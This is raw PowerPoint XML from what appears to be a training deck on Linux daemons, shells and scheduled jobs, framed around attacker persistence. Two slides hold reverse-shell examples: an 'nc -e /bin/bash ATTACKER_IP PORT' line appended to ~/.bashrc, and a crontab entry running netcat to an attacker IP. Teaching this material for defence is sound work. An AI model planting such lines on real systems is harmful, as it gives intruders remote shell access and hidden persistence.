            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Common Linux Daemons</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2298091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i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>netd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – Internet operation daemon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> firewall daemon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>memcached</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – in-memory distributed object caching daemon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mountd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – mount daemon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – database server daemon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>amed – Domain Name Service (DNS) daemon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fsd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – network file sharing daemon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ntpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – Network Time Protocol (NTP) daemon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>postfix – a mail transport agent used as a replacement for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sendmail</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Common Linux Daemons</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2733499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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>outed – manages routing tables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rpcbind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – Remote Procedure Call bind daemon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mbd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – SMB daemon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mtpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – Simple Mail Transfer Protocol (SMTP) daemon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nmpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – Simple Network Management Protocol (SNMP) daemon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – Secure Shell Server daemon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>yncd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – Keeps file systems synched with system memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>yslogd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – system logging daemon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – update to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>init</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>inetd – Extended Internet operations daemon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Common Linux Daemons</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1419466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564262" y="4642704"/>
            <a:ext cx="4119738" cy="1865586"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Shells</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Allows system users to communicate with the Kernel (interactive and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>noninteractive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Four common shell types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shell Command Language (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bourne Again Shell (BASH) default for Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C Shell (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>csh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>KornShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ksh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User scripts and profiles may run shells</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Key Linux components</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Google Shape;112;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9692640" y="5344159"/>
            <a:ext cx="944879" cy="447041"/>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Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="849700" y="5434858"/>
            <a:ext cx="6372862" cy="712684"/>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rPr>
              <a:t>$ echo ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –e /bin/bash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ATTACKER_IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PORT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/dev/null &amp;’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bashrc</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1454678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crontab</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>System-wide jobs installed by modify /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>crontab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Locations to Less </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>crontab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ls /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(daily, hourly, weekly, monthly)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>at jobs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Executes commands at a specific time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not for recurring tasks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/at/jobs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/spool/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>atjobs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scheduled Jobs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6095999" y="3077107"/>
            <a:ext cx="5972175" cy="670286"/>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r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>36 2   *   *  7 lion1  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –e  /bin/bash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
